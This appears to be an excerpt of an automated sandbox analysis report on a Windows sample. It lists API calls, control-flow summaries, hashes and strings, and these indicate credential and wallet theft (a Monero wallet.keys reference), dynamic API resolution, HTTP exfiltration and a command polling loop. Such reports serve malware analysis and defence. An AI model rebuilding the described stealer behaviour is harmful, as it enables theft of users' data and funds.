                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: 8b462cd36f24df4b4ca510cad381d89232596f30f984a8449c6760beb18a746a
                          • Instruction ID: 20cf7de71441e090b42239d53a9037580b2980235055d27f3fc788ab4f19a7f6
                          • Opcode Fuzzy Hash: 8b462cd36f24df4b4ca510cad381d89232596f30f984a8449c6760beb18a746a
                          • Instruction Fuzzy Hash: CAA16BB5580240BFF345EFA8ED889563BF9F79C701734C51BA605C3224D63DA852EB2A

                          Control-flow Graph

                          control_flow_graph 764 5445c0-544695 RtlAllocateHeap 781 5446a0-5446a6 764->781 782 5446ac-54474a 781->782 783 54474f-5447a9 VirtualProtect 781->783 782->781
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0054460F
                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0054479C
                          Strings
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544765, 005445DD, 00544683, 0054475A, 0054474F, 005446CD, 00544643, 005446B7, 00544734, 00544617, 0054466D, 005446D8, 005446AC, 00544662, 00544729, 00544713, 0054477B, 00544638, 00544678, 005445C7, 005445D2, 005445F3, 00544657, 0054471E, 0054473F, 005445E8, 0054462D, 00544770, 005446C2, 00544622
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-2218711628
                          • Opcode ID: 4f384c44a6c619a920b511336b561b7f5fc94229a2d4c7a29801b4a3bfa891bc
                          • Instruction ID: a659e77437ee3ac910183a803c7a627ab56816e790ed29c6dc2ed597917957bf
                          • Opcode Fuzzy Hash: 4f384c44a6c619a920b511336b561b7f5fc94229a2d4c7a29801b4a3bfa891bc
                          • Instruction Fuzzy Hash: 8F41F6747C660C7AC724FBA4A86EEED7B66FF52704F685440A8C153380DAF07508C51A

                          Control-flow Graph

                          control_flow_graph 801 544880-544942 call 55a7a0 call 5447b0 call 55a740 * 5 InternetOpenA StrCmpCA 816 544944 801->816 817 54494b-54494f 801->817 816->817 818 544955-544acd call 558b60 call 55a920 call 55a8a0 call 55a800 * 2 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a920 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a920 call 55a8a0 call 55a800 * 2 InternetConnectA 817->818 819 544ecb-544ef3 InternetCloseHandle call 55aad0 call 549ac0 817->819 818->819 905 544ad3-544ad7 818->905 829 544ef5-544f2d call 55a820 call 55a9b0 call 55a8a0 call 55a800 819->829 830 544f32-544fa2 call 558990 * 2 call 55a7a0 call 55a800 * 8 819->830 829->830 906 544ae5 905->906 907 544ad9-544ae3 905->907 908 544aef-544b22 HttpOpenRequestA 906->908 907->908 909 544ebe-544ec5 InternetCloseHandle 908->909 910 544b28-544e28 call 55a9b0 call 55a8a0 call 55a800 call 55a920 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a920 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a920 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a920 call 55a8a0 call 55a800 call 55a740 call 55a920 * 2 call 55a8a0 call 55a800 * 2 call 55aad0 lstrlen call 55aad0 * 2 lstrlen call 55aad0 HttpSendRequestA 908->910 909->819 1021 544e32-544e5c InternetReadFile 910->1021 1022 544e67-544eb9 InternetCloseHandle call 55a800 1021->1022 1023 544e5e-544e65 1021->1023 1022->909 1023->1022 1024 544e69-544ea7 call 55a9b0 call 55a8a0 call 55a800 1023->1024 1024->1021
                          APIs
                            • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                            • Part of subcall function 005447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
                            • Part of subcall function 005447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00544915
                          • StrCmpCA.SHLWAPI(?,0123FBD0), ref: 0054493A
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00544ABA
                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00560DDB,00000000,?,?,00000000,?,",00000000,?,0123FCD0), ref: 00544DE8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00544E04
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00544E18
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00544E49
                          • InternetCloseHandle.WININET(00000000), ref: 00544EAD
                          • InternetCloseHandle.WININET(00000000), ref: 00544EC5
                          • HttpOpenRequestA.WININET(00000000,0123FBA0,?,0123F440,00000000,00000000,00400100,00000000), ref: 00544B15
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                          • InternetCloseHandle.WININET(00000000), ref: 00544ECF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Similarity
                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 460715078-2180234286
                          • Opcode ID: 76d4342f6211b18752b50b7f1c5d415cab95fde370bf9f711a7bec7185ee0b97
                          • Instruction ID: 11bfdefe5bde5ff7d9ebae7526ccd04d132c2cd9998d10409d069d06a633ba0d
                          • Opcode Fuzzy Hash: 76d4342f6211b18752b50b7f1c5d415cab95fde370bf9f711a7bec7185ee0b97
                          • Instruction Fuzzy Hash: 83120F72910119AADB15EB90DC66FEEBB38BF94301F50429AB50663091EF702F4DCF66
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005411B7), ref: 00557880
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00557887
                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0055789F
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: d4bb8fca113f90ce062dd9405b857bb141b1039c1f5e13a0eeb606f1434eb7c5
                          • Instruction ID: 2c4d2b98053619506c1266ad9c209b0f1d8a9943a6f3c67b784837e2a1d16652
                          • Opcode Fuzzy Hash: d4bb8fca113f90ce062dd9405b857bb141b1039c1f5e13a0eeb606f1434eb7c5
                          • Instruction Fuzzy Hash: 0BF04FB2944208ABDB10DF98DD49BAEBBB8FB08721F10465AFA05A2680C77815048BA1
                          Similarity
                          • API ID: ExitInfoProcessSystem
                          • String ID:
                          • API String ID: 752954902-0
                          • Opcode ID: 31d03117b2dd062b03e29f2b2052961c476beeff6c710425227f5370a305d842
                          • Instruction ID: 866bd86557b26f156826fc20dd0e5d3d36d6d3039ae17df4f0d0e268f7677cd0
                          • Opcode Fuzzy Hash: 31d03117b2dd062b03e29f2b2052961c476beeff6c710425227f5370a305d842
                          • Instruction Fuzzy Hash: 02D05E7494030CEBDB00DFE0D8496DDBB78FB08315F101555D90562340EA345481CBAA

                          Control-flow Graph (rendered graph not recoverable from extraction; legend: Executed / Not Executed; entry block 559c10-559c1a; API calls on the graph: LoadLibraryA * 8, GetProcAddress * 104 in per-module groups of 43, 5, 8, 5, 6, 9, 5, 2, 2, 10, 4, 1 and 4)
                          APIs
                          • GetProcAddress.KERNEL32(76210000,012253C8), ref: 00559C2D
                          • GetProcAddress.KERNEL32(76210000,012255C8), ref: 00559C45
                          • GetProcAddress.KERNEL32(76210000,01239070), ref: 00559C5E
                          • GetProcAddress.KERNEL32(76210000,01238FB0), ref: 00559C76
                          • GetProcAddress.KERNEL32(76210000,01238FF8), ref: 00559C8E
                          • GetProcAddress.KERNEL32(76210000,0123DCE8), ref: 00559CA7
                          • GetProcAddress.KERNEL32(76210000,0122A5E0), ref: 00559CBF
                          • GetProcAddress.KERNEL32(76210000,0123DB98), ref: 00559CD7
                          • GetProcAddress.KERNEL32(76210000,0123DDA8), ref: 00559CF0
                          • GetProcAddress.KERNEL32(76210000,0123DAC0), ref: 00559D08
                          • GetProcAddress.KERNEL32(76210000,0123DBF8), ref: 00559D20
                          • GetProcAddress.KERNEL32(76210000,01225468), ref: 00559D39
                          • GetProcAddress.KERNEL32(76210000,01225488), ref: 00559D51
                          • GetProcAddress.KERNEL32(76210000,012255E8), ref: 00559D69
                          • GetProcAddress.KERNEL32(76210000,01225528), ref: 00559D82
                          • GetProcAddress.KERNEL32(76210000,0123DB08), ref: 00559D9A
                          • GetProcAddress.KERNEL32(76210000,0123DB20), ref: 00559DB2
                          • GetProcAddress.KERNEL32(76210000,0122A900), ref: 00559DCB
                          • GetProcAddress.KERNEL32(76210000,012253E8), ref: 00559DE3
                          • GetProcAddress.KERNEL32(76210000,0123DB68), ref: 00559DFB
                          • GetProcAddress.KERNEL32(76210000,0123DC70), ref: 00559E14
                          • GetProcAddress.KERNEL32(76210000,0123DB38), ref: 00559E2C
                          • GetProcAddress.KERNEL32(76210000,0123DD60), ref: 00559E44
                          • GetProcAddress.KERNEL32(76210000,01225668), ref: 00559E5D
                          • GetProcAddress.KERNEL32(76210000,0123DAD8), ref: 00559E75
                          • GetProcAddress.KERNEL32(76210000,0123DD30), ref: 00559E8D
                          • GetProcAddress.KERNEL32(76210000,0123DD00), ref: 00559EA6
                          • GetProcAddress.KERNEL32(76210000,0123DD18), ref: 00559EBE
                          • GetProcAddress.KERNEL32(76210000,0123DD78), ref: 00559ED6
                          • GetProcAddress.KERNEL32(76210000,0123DD48), ref: 00559EEF
                          • GetProcAddress.KERNEL32(76210000,0123DD90), ref: 00559F07
                          • GetProcAddress.KERNEL32(76210000,0123DAF0), ref: 00559F1F
                          • GetProcAddress.KERNEL32(76210000,0123DB50), ref: 00559F38
                          • GetProcAddress.KERNEL32(76210000,0122FCE8), ref: 00559F50
                          • GetProcAddress.KERNEL32(76210000,0123DBB0), ref: 00559F68
                          • GetProcAddress.KERNEL32(76210000,0123DB80), ref: 00559F81
                          • GetProcAddress.KERNEL32(76210000,012256A8), ref: 00559F99
                          • GetProcAddress.KERNEL32(76210000,0123DC88), ref: 00559FB1
                          • GetProcAddress.KERNEL32(76210000,012256C8), ref: 00559FCA
                          • GetProcAddress.KERNEL32(76210000,0123DCA0), ref: 00559FE2
                          • GetProcAddress.KERNEL32(76210000,0123DBC8), ref: 00559FFA
                          • GetProcAddress.KERNEL32(76210000,01225348), ref: 0055A013
                          • GetProcAddress.KERNEL32(76210000,01225408), ref: 0055A02B
                          • LoadLibraryA.KERNEL32(0123DCB8,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A03D
                          • LoadLibraryA.KERNEL32(0123DC58,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A04E
                          • LoadLibraryA.KERNEL32(0123DBE0,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A060
                          • LoadLibraryA.KERNEL32(0123DCD0,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A072
                          • LoadLibraryA.KERNEL32(0123DC10,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A083
                          • LoadLibraryA.KERNEL32(0123DC28,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A095
                          • LoadLibraryA.KERNEL32(0123DC40,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A0A7
                          • LoadLibraryA.KERNEL32(0123DE38,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A0B8
                          • GetProcAddress.KERNEL32(751E0000,012251E8), ref: 0055A0DA
                          • GetProcAddress.KERNEL32(751E0000,0123DEB0), ref: 0055A0F2
                          • GetProcAddress.KERNEL32(751E0000,01238918), ref: 0055A10A
                          • GetProcAddress.KERNEL32(751E0000,0123DF70), ref: 0055A123
                          • GetProcAddress.KERNEL32(751E0000,012250A8), ref: 0055A13B
                          • GetProcAddress.KERNEL32(73FE0000,0122A658), ref: 0055A160
                          • GetProcAddress.KERNEL32(73FE0000,01224F88), ref: 0055A179
                          • GetProcAddress.KERNEL32(73FE0000,0122A748), ref: 0055A191
                          • GetProcAddress.KERNEL32(73FE0000,0123DEC8), ref: 0055A1A9
                          • GetProcAddress.KERNEL32(73FE0000,0123DEE0), ref: 0055A1C2
                          • GetProcAddress.KERNEL32(73FE0000,01225148), ref: 0055A1DA
                          • GetProcAddress.KERNEL32(73FE0000,01225208), ref: 0055A1F2
                          • GetProcAddress.KERNEL32(73FE0000,0123DF40), ref: 0055A20B
                          • GetProcAddress.KERNEL32(753A0000,01225008), ref: 0055A22C
                          • GetProcAddress.KERNEL32(753A0000,01224FE8), ref: 0055A244
                          • GetProcAddress.KERNEL32(753A0000,0123DDC0), ref: 0055A25D
                          • GetProcAddress.KERNEL32(753A0000,0123DDF0), ref: 0055A275
                          • GetProcAddress.KERNEL32(753A0000,01225108), ref: 0055A28D
                          • GetProcAddress.KERNEL32(76310000,0122A770), ref: 0055A2B3
                          • GetProcAddress.KERNEL32(76310000,0122A928), ref: 0055A2CB
                          • GetProcAddress.KERNEL32(76310000,0123DF10), ref: 0055A2E3
                          • GetProcAddress.KERNEL32(76310000,012252E8), ref: 0055A2FC
                          • GetProcAddress.KERNEL32(76310000,01225068), ref: 0055A314
                          • GetProcAddress.KERNEL32(76310000,0122A798), ref: 0055A32C
                          • GetProcAddress.KERNEL32(76910000,0123DE08), ref: 0055A352
                          • GetProcAddress.KERNEL32(76910000,01225308), ref: 0055A36A
                          • GetProcAddress.KERNEL32(76910000,012388D8), ref: 0055A382
                          • GetProcAddress.KERNEL32(76910000,0123DDD8), ref: 0055A39B
                          • GetProcAddress.KERNEL32(76910000,0123DEF8), ref: 0055A3B3
                          • GetProcAddress.KERNEL32(76910000,01225228), ref: 0055A3CB
                          • GetProcAddress.KERNEL32(76910000,01224FA8), ref: 0055A3E4
                          • GetProcAddress.KERNEL32(76910000,0123DF28), ref: 0055A3FC
                          • GetProcAddress.KERNEL32(76910000,0123DF58), ref: 0055A414
                          • GetProcAddress.KERNEL32(75B30000,01225128), ref: 0055A436
                          • GetProcAddress.KERNEL32(75B30000,0123DE80), ref: 0055A44E
                          • GetProcAddress.KERNEL32(75B30000,0123DE20), ref: 0055A466
                          • GetProcAddress.KERNEL32(75B30000,0123DE50), ref: 0055A47F
                          • GetProcAddress.KERNEL32(75B30000,0123DE68), ref: 0055A497
                          • GetProcAddress.KERNEL32(75670000,012250E8), ref: 0055A4B8
                          • GetProcAddress.KERNEL32(75670000,012250C8), ref: 0055A4D1
                          • GetProcAddress.KERNEL32(76AC0000,01225288), ref: 0055A4F2
                          • GetProcAddress.KERNEL32(76AC0000,0123DE98), ref: 0055A50A
                          • GetProcAddress.KERNEL32(6F4E0000,01225168), ref: 0055A530
                          • GetProcAddress.KERNEL32(6F4E0000,01225088), ref: 0055A548
                          • GetProcAddress.KERNEL32(6F4E0000,01225028), ref: 0055A560
                          • GetProcAddress.KERNEL32(6F4E0000,0123D880), ref: 0055A579
                          • GetProcAddress.KERNEL32(6F4E0000,01225248), ref: 0055A591
                          • GetProcAddress.KERNEL32(6F4E0000,01225048), ref: 0055A5A9
                          • GetProcAddress.KERNEL32(6F4E0000,01225188), ref: 0055A5C2
                          • GetProcAddress.KERNEL32(6F4E0000,01224F68), ref: 0055A5DA
                          • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 0055A5F1
                          • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 0055A607
                          • GetProcAddress.KERNEL32(75AE0000,0123D970), ref: 0055A629
                          • GetProcAddress.KERNEL32(75AE0000,01238968), ref: 0055A641
                          • GetProcAddress.KERNEL32(75AE0000,0123D940), ref: 0055A659
                          • GetProcAddress.KERNEL32(75AE0000,0123D7C0), ref: 0055A672
                          • GetProcAddress.KERNEL32(76300000,012251A8), ref: 0055A693
                          • GetProcAddress.KERNEL32(6FE40000,0123D910), ref: 0055A6B4
                          • GetProcAddress.KERNEL32(6FE40000,012251C8), ref: 0055A6CD
                          • GetProcAddress.KERNEL32(6FE40000,0123D928), ref: 0055A6E5
                          • GetProcAddress.KERNEL32(6FE40000,0123D838), ref: 0055A6FD
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: HttpQueryInfoA$InternetSetOptionA
                          • API String ID: 2238633743-1775429166
                          • Opcode ID: ab8a27108a65ba8c055d097de610c528c0ed7bb585d3e44f9a6f01189315d8c2
                          • Instruction ID: 8c2bd1f46042af4331dff5695dd1bf9af67209197da10ad2c688805e08b5f95d
                          • Opcode Fuzzy Hash: ab8a27108a65ba8c055d097de610c528c0ed7bb585d3e44f9a6f01189315d8c2
                          • Instruction Fuzzy Hash: 4F623DB5680200BFF745DFA8ED889563BF9F79C701734C51BA609C3224D63DA452EB2A

                          Control-flow Graph (rendered graph not recoverable from extraction; legend: Executed / Not Executed; entry block 546280-54630b; API calls on the graph: InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, HttpSendRequestA, HttpQueryInfoA, InternetReadFile, InternetCloseHandle)
                          APIs
                            • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                            • Part of subcall function 005447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
                            • Part of subcall function 005447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                          • InternetOpenA.WININET(00560DFE,00000001,00000000,00000000,00000000), ref: 005462E1
                          • StrCmpCA.SHLWAPI(?,0123FBD0), ref: 00546303
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00546335
                          • HttpOpenRequestA.WININET(00000000,GET,?,0123F440,00000000,00000000,00400100,00000000), ref: 00546385
                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005463BF
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005463D1
                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 005463FD
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0054646D
                          • InternetCloseHandle.WININET(00000000), ref: 005464EF
                          • InternetCloseHandle.WININET(00000000), ref: 005464F9
                          • InternetCloseHandle.WININET(00000000), ref: 00546503
                          Similarity
                          • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                          • String ID: ERROR$ERROR$GET
                          • API String ID: 3749127164-2509457195
                          • Opcode ID: ab40f46a5d2469f8a56c078fce8667cc4f8a2533513d04537aace29373dedb36
                          • Instruction ID: 7f514b6d827b27c4ef4e35ce086dbf0955f25cf08fa387ffc761687a3b59f8c0
                          • Opcode Fuzzy Hash: ab40f46a5d2469f8a56c078fce8667cc4f8a2533513d04537aace29373dedb36
                          • Instruction Fuzzy Hash: 69717E71A40218ABEF24DFA0CC99BEE7B74FB44705F108199F5096B190DBB46A89CF52

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1090 555510-555577 call 555ad0 call 55a820 * 3 call 55a740 * 4 1106 55557c-555583 1090->1106 1107 555585-5555b6 call 55a820 call 55a7a0 call 541590 call 5551f0 1106->1107 1108 5555d7-55564c call 55a740 * 2 call 541590 call 5552c0 call 55a8a0 call 55a800 call 55aad0 StrCmpCA 1106->1108 1124 5555bb-5555d2 call 55a8a0 call 55a800 1107->1124 1134 555693-5556a9 call 55aad0 StrCmpCA 1108->1134 1138 55564e-55568e call 55a7a0 call 541590 call 5551f0 call 55a8a0 call 55a800 1108->1138 1124->1134 1139 5557dc-555844 call 55a8a0 call 55a820 * 2 call 541670 call 55a800 * 4 call 556560 call 541550 1134->1139 1140 5556af-5556b6 1134->1140 1138->1134 1270 555ac3-555ac6 1139->1270 1143 5556bc-5556c3 1140->1143 1144 5557da-55585f call 55aad0 StrCmpCA 1140->1144 1148 5556c5-555719 call 55a820 call 55a7a0 call 541590 call 5551f0 call 55a8a0 call 55a800 1143->1148 1149 55571e-555793 call 55a740 * 2 call 541590 call 5552c0 call 55a8a0 call 55a800 call 55aad0 StrCmpCA 1143->1149 1163 555865-55586c 1144->1163 1164 555991-5559f9 call 55a8a0 call 55a820 * 2 call 541670 call 55a800 * 4 call 556560 call 541550 1144->1164 1148->1144 1149->1144 1249 555795-5557d5 call 55a7a0 call 541590 call 5551f0 call 55a8a0 call 55a800 1149->1249 1170 555872-555879 1163->1170 1171 55598f-555a14 call 55aad0 StrCmpCA 1163->1171 1164->1270 1179 5558d3-555948 call 55a740 * 2 call 541590 call 5552c0 call 55a8a0 call 55a800 call 55aad0 StrCmpCA 1170->1179 1180 55587b-5558ce call 55a820 call 55a7a0 call 541590 call 5551f0 call 55a8a0 call 55a800 1170->1180 1200 555a16-555a21 Sleep 1171->1200 1201 555a28-555a91 call 55a8a0 call 55a820 * 2 call 541670 call 55a800 * 4 call 556560 call 541550 1171->1201 1179->1171 1275 55594a-55598a call 55a7a0 call 541590 call 5551f0 call 55a8a0 call 55a800 1179->1275 1180->1171 1200->1106 1201->1270 1249->1144 1275->1171
                          APIs
                            • Part of subcall function 0055A820: lstrlen.KERNEL32(00544F05,?,?,00544F05,00560DDE), ref: 0055A82B
                            • Part of subcall function 0055A820: lstrcpy.KERNEL32(00560DDE,00000000), ref: 0055A885
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00555644
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005556A1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00555857
                            • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                            • Part of subcall function 005551F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00555228
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                            • Part of subcall function 005552C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00555318
                            • Part of subcall function 005552C0: lstrlen.KERNEL32(00000000), ref: 0055532F
                            • Part of subcall function 005552C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00555364
                            • Part of subcall function 005552C0: lstrlen.KERNEL32(00000000), ref: 00555383
                            • Part of subcall function 005552C0: lstrlen.KERNEL32(00000000), ref: 005553AE
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0055578B
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00555940
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00555A0C
                          • Sleep.KERNEL32(0000EA60), ref: 00555A1B
                          Strings
                          Memory Dump Source
